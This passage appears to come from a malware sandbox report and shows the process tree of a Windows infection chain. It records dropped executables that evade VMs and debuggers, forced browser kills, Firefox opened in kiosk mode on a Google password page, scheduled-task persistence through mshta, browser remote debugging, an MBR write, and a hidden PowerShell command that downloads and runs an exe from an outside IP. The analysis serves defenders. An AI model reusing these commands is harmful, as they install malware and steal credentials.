                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:8
                                    7⤵
                                      PID:5704
                                • C:\Users\Admin\AppData\Local\Temp\1088055001\63b3bc936f.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088055001\63b3bc936f.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:4736
                                • C:\Users\Admin\AppData\Local\Temp\1088056001\ff96711009.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088056001\ff96711009.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:4256
                                • C:\Users\Admin\AppData\Local\Temp\1088057001\ac8cfb0b0f.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088057001\ac8cfb0b0f.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:4936
                                • C:\Users\Admin\AppData\Local\Temp\1088058001\90b8a075ab.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088058001\90b8a075ab.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:2084
                                • C:\Users\Admin\AppData\Local\Temp\1088059001\fe390939a4.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088059001\fe390939a4.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5056
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM firefox.exe /T
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2460
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM chrome.exe /T
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4268
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM msedge.exe /T
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2068
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM opera.exe /T
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1064
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM brave.exe /T
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4496
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                    6⤵
                                      PID:3824
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                        7⤵
                                        • Checks processor information in registry
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3156
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1932 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {96210bcc-70b1-413d-b79d-0a022e5c1825} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" gpu
                                          8⤵
                                            PID:1900
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08d94412-11cf-448a-aeba-0c00390a9d95} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" socket
                                            8⤵
                                              PID:4920
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3096 -childID 1 -isForBrowser -prefsHandle 1492 -prefMapHandle 2996 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d97fa026-6166-4a2f-a3c3-2624bbc99d8b} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
                                              8⤵
                                                PID:2792
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3080 -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 3204 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92788a3e-a0f8-46a2-9850-b565493f8287} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
                                                8⤵
                                                  PID:2488
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4444 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4440 -prefMapHandle 4428 -prefsLen 32856 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7d892fa-03f3-4ee8-80d7-1272e0dddd6b} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" utility
                                                  8⤵
                                                  • Checks processor information in registry
                                                  PID:7164
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5164 -childID 3 -isForBrowser -prefsHandle 5152 -prefMapHandle 5188 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ade8f78-bc06-4085-aa04-bc8d25769f26} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
                                                  8⤵
                                                    PID:7876
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5320 -childID 4 -isForBrowser -prefsHandle 5328 -prefMapHandle 5332 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26c4a674-fb50-476c-b6a3-5fe5e55bf3f8} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
                                                    8⤵
                                                      PID:7892
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 5 -isForBrowser -prefsHandle 5600 -prefMapHandle 5596 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {214408c2-1011-4c0a-9d75-7404cafc4b55} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
                                                      8⤵
                                                        PID:8012
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3340 -childID 6 -isForBrowser -prefsHandle 3064 -prefMapHandle 6132 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79aa3a28-337e-4553-bcfd-babeaf37c54e} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
                                                        8⤵
                                                          PID:6836
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6372 -childID 7 -isForBrowser -prefsHandle 6336 -prefMapHandle 6272 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {988447d2-1bb6-4853-b84e-cc02045989bf} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
                                                          8⤵
                                                            PID:7216
                                                    • C:\Users\Admin\AppData\Local\Temp\1088060001\83c51029eb.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1088060001\83c51029eb.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3668
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c schtasks /create /tn TboKwmaZmTU /tr "mshta C:\Users\Admin\AppData\Local\Temp\OjRuY8Tvb.hta" /sc minute /mo 25 /ru "Admin" /f
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4256
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn TboKwmaZmTU /tr "mshta C:\Users\Admin\AppData\Local\Temp\OjRuY8Tvb.hta" /sc minute /mo 25 /ru "Admin" /f
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:5452
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        mshta C:\Users\Admin\AppData\Local\Temp\OjRuY8Tvb.hta
                                                        6⤵
                                                        • Checks computer location settings
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3968
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                          7⤵
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Downloads MZ/PE file
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:7356
                                                          • C:\Users\Admin\AppData\Local\Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
                                                            "C:\Users\Admin\AppData\Local\Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE"
                                                            8⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6136
                                                    • C:\Users\Admin\AppData\Local\Temp\1088061001\ea982cbaed.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1088061001\ea982cbaed.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Writes to the Master Boot Record (MBR)
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6160
                                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exe
                                                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exe
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3116
                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exe
                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exe
                                                2⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Downloads MZ/PE file
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Loads dropped DLL
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of WriteProcessMemory
                                                PID:3592
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                  3⤵
                                                  • Uses browser remote debugging
                                                  • Enumerates system info in registry
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3724
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8e99ecc40,0x7ff8e99ecc4c,0x7ff8e99ecc58
                                                    4⤵
                                                      PID:2836
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1844 /prefetch:2
                                                      4⤵
                                                        PID:1340
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2216 /prefetch:3
                                                        4⤵
                                                          PID:2628
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2472 /prefetch:8
                                                          4⤵
                                                            PID:2212
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            PID:1604
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3436,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3460 /prefetch:1
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            PID:1912
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:1
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            PID:2724
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8
                                                            4⤵
                                                              PID:2340
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4700 /prefetch:8
                                                              4⤵
                                                                PID:2028
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:8
                                                                4⤵
                                                                  PID:4864
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5032,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5040 /prefetch:8
                                                                  4⤵
                                                                    PID:1352
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                  3⤵
                                                                  • Uses browser remote debugging
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:4532
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8e99f46f8,0x7ff8e99f4708,0x7ff8e99f4718
                                                                    4⤵
                                                                    • Checks processor information in registry
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4964
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
                                                                    4⤵
                                                                      PID:2792
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4284
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
                                                                      4⤵
                                                                        PID:1412
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2572 /prefetch:2
                                                                        4⤵
                                                                          PID:864
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                                                          4⤵
                                                                          • Uses browser remote debugging
                                                                          PID:1656
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                                                                          4⤵
                                                                          • Uses browser remote debugging
                                                                          PID:3992
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2568 /prefetch:2
                                                                          4⤵
                                                                            PID:5088
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2116 /prefetch:2
                                                                            4⤵
                                                                              PID:3828
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2604 /prefetch:2
                                                                              4⤵
                                                                                PID:2628
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3256 /prefetch:2
                                                                                4⤵
                                                                                  PID:1440
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3300 /prefetch:2
                                                                                  4⤵
                                                                                    PID:100
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
